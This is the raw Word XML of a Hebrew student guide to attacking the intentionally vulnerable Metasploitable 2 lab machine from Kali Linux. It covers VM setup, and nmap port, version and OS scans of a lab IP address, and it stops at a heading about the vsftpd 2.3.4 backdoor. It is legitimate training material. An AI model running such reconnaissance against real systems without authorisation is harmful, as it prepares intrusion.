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CC2A" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="0099526A" w:rsidRDefault="00931C77" w:rsidP="00931C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk66722302"/>
      <w:bookmarkStart w:id="1" w:name="_Hlk66969984"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="0099526A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
        <w:t>פרויקט גמר – מגן סייבר</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4585484A" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="0099526A" w:rsidRDefault="00931C77" w:rsidP="00931C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099526A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">מכללת </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>John</w:t>
      </w:r>
      <w:r w:rsidRPr="0099526A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B</w:t>
      </w:r>
      <w:r w:rsidRPr="0099526A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ryce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25332157" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="0099526A" w:rsidRDefault="00931C77" w:rsidP="00931C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099526A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
        <w:t>גיא ונג</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3592D402" w14:textId="77777777" w:rsidR="00931C77" w:rsidRPr="0099526A" w:rsidRDefault="00931C77" w:rsidP="00931C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0099526A">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:rtl/>
        </w:rPr>
        <w:t>מחזור 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318C2326" w14:textId="2C81ADA7" w:rsidR="00931C77" w:rsidRPr="007D51BF" w:rsidRDefault="00931C77" w:rsidP="00931C77">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian" w:cstheme="minorHAnsi"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="single"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:ascii="Algerian" w:hAnsi="Algerian" w:cstheme="minorHAnsi"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Metasploitable 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF9B8A" w14:textId="6A16FBE7" w:rsidR="00E6416D" w:rsidRPr="007D51BF" w:rsidRDefault="005B195E" w:rsidP="00E6416D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גרסה זו פורסמה ב12 ביוני 2012 במטרה לבצע הדרכות אבטחה בדיקות חדירה ותרגול טכניקות תקיפה.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD585B8" w14:textId="4C7F3E4D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bookmarkStart w:id="2" w:name="_Hlk66973725"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">במדריך אדגים מספר התקפות על המכונה </w:t>
      </w:r>
      <w:r w:rsidR="00D621F1" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etasploitable 2</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> באמצעות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali linux</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4977EAB7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לצורך ביצוע ההתקפות צריך להתקין את המכונות הווירטואליות מהקישורים הבאים:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18744686" w14:textId="2D676D51" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/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</w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidR="00731994" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2020.4</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://cdimage.kali.org/kali-2020.4</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:sz w:val="27"/>
            <w:szCs w:val="27"/>
          </w:rPr>
          <w:t>kali-linux-2020.4-installer-amd64.iso</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3FC24691" w14:textId="28E8A53B" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="009F468F" w:rsidP="006E68E4">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://sourceforge.net/projects/metasploitable/files/Metasploitable2</w:t>
        </w:r>
        <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:rtl/>
          </w:rPr>
          <w:t>/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="00731994" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B19F1E2" w14:textId="64F0A5E4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לאחר התקנת המכונות נעלה את </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ואת </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi" w:hint="cs"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ונבדק את כתובות </w:t>
      </w:r>
      <w:r w:rsidR="007E57B1" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">IP </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> של המכונות </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D613056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עם הפקודה: </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248826CA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</w:rPr>
        <w:t>kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1644DB2B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74976" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="386B0ECE" wp14:editId="2959915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196840" cy="1638300"/>
            <wp:effectExtent l="0" t="0" r="381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8B48B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BF0D4B9" wp14:editId="76687F23">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2137410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>88265</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="952500" cy="255270"/>
                <wp:effectExtent l="19050" t="19050" r="19050" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="76" name="מלבן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1207A" id="מלבן 76" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:168.3pt;margin-top:6.95pt;width:75pt;height:20.1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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5333F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35FDE4D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8412961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26DD5232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3A7077B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76000" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05B74A5D" wp14:editId="6C298ABF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151120" cy="140970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sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D6BFD2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B493A9" wp14:editId="408D14CF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2754630</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>96520</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1078230" cy="198120"/>
                <wp:effectExtent l="19050" t="19050" r="26670" b="11430"/>
                <wp:wrapNone/>
                <wp:docPr id="77" name="מלבן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186A1" id="מלבן 77" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:216.9pt;margin-top:7.6pt;width:84.9pt;height:15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" filled="f" strokecolor="yellow" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E898F5E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E4DC5D7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8ABA7E4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0C54A70E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2ADEF71B" w14:textId="4E606B07" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="0090322B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בהמשך המדריך הכתובות ישתנו.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA3C7F6" w14:textId="7BDF0E94" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="373F5055" w14:textId="77777777" w:rsidR="00F327BB" w:rsidRPr="007D51BF" w:rsidRDefault="00F327BB" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46BA8A8B" w14:textId="368B6426" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006B6C9F" w:rsidP="006B6C9F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תחילה יש לאסוף מידע על המכונה </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">נבצע סריקת על </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> metasploitable</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">באמצעות הכלי </w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:r w:rsidR="006E68E4" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> כדי לחפש שירותים פתוחים שאותם ניתן לנצל </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D61D820" w14:textId="37F4FA5B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הפקודה </w:t>
      </w:r>
      <w:r w:rsidR="001A2FFE" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>שאני השתמשתי ה</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve">יא: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596F15EC" w14:textId="4C354BFA" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="000B193E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pP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lastRenderedPageBreak/>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w: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sV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B08445" w14:textId="36B784D6" w:rsidR="001A2FFE" w:rsidRPr="007D51BF" w:rsidRDefault="001A2FFE" w:rsidP="000B193E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ניתן לבצע חיפוש קצת יותר מורחב עם הפקודה </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4004772E" w14:textId="78C42CF0" w:rsidR="00F327BB" w:rsidRPr="007D51BF" w:rsidRDefault="001A2FFE" w:rsidP="00E6416D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pP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nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w: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Sv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O -T4 -p 1-65535 192.168.1.156</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B217EB7" w14:textId="77777777" w:rsidR="000B193E" w:rsidRPr="007D51BF" w:rsidRDefault="000B193E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5A6AFB6A" w14:textId="6878F675" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000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77024" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="114E95BB" wp14:editId="10BCC0EB">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-222250</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6903720" cy="3847715"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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641" cy="386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84195" w14:textId="4C28968A" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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4C2407D8" w14:textId="1D4DCFE6" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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4D2D69A5" w14:textId="623AB688" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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01796636" w14:textId="2952E130" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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6B95B16C" w14:textId="68C47069" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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53194B3A" w14:textId="0C67DD2B" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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079C8015" w14:textId="19EA67B8" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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5099B943" w14:textId="34651AC1" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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25C028AB" w14:textId="57E4F7B2" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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05FF3DC3" w14:textId="2BF10A01" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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591989A0" w14:textId="43C1A0FB" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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70F0B61E" w14:textId="77777777" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B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553C0186" w14:textId="27F4EDC6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כמו שניתן לראות מצאנו לא מעט שירותים שאותם שניתן לנצל. אפשר להבחין באיזו פורט </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>port)</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> אותו שירות משתמש, מהו סוג השירות </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(service)</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> ובאיזו גרסה </w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(version)</w:t>
      </w:r>
      <w:r w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> השירות עובד.</w:t>
      </w:r>
      <w:r w:rsidR="006B6C9F" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
        <w:t xml:space="preserve"> המידע המוצג בפנינו הוא חשוב מאוד לצורך הצלחת ההתקפות.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706CDDD1" w14:textId="77777777" w:rsidR="0090322B" w:rsidRPr="007D51BF" w:rsidRDefault="0090322B" w:rsidP="006E68E4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54727A63" w14:textId="155AA626" w:rsidR="006E68E4" w:rsidRPr="007D51BF" w:rsidRDefault="006E68E4" w:rsidP="006E68E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D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vsftpd 2.3.4 backdoor</w:t>
      </w:r>
      <w:r w:rsidR="0002686C" w:rsidRPr="007D51BF">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorBidi" w:hAnsiTheme="minorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> port 21</w:t>
      </w:r>
    </w:p>
